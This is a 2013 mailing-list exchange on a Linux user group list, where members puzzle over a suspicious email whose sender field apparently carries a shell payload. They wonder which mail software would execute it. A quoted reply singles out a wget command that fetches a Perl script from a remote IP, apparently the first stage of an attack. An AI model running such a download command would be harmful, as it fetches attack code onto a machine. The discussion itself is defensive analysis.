[GLLUG] Can anyone tell me what this is trying to do?
john at sinodun.org.uk
Mon Nov 4 16:39:13 UTC 2013
On Mon, 4 Nov 2013 16:34:43 -0000, "Martin A. Brooks"
<martin at hinterlands.org> wrote:
> On Mon, November 4, 2013 16:26, John Winters wrote:
>> I've been googling, but can't discover what this is trying to do. Is
>> current vulnerability in any common MTA?
> wget http://184.108.40.206/user.pl
OK - I should have made my question clearer. I can see the payload, but
I'm puzzled as to how the line of code would come to be executed in the
first place. What MTA or MUA would execute the sender's name?
More information about the GLLUG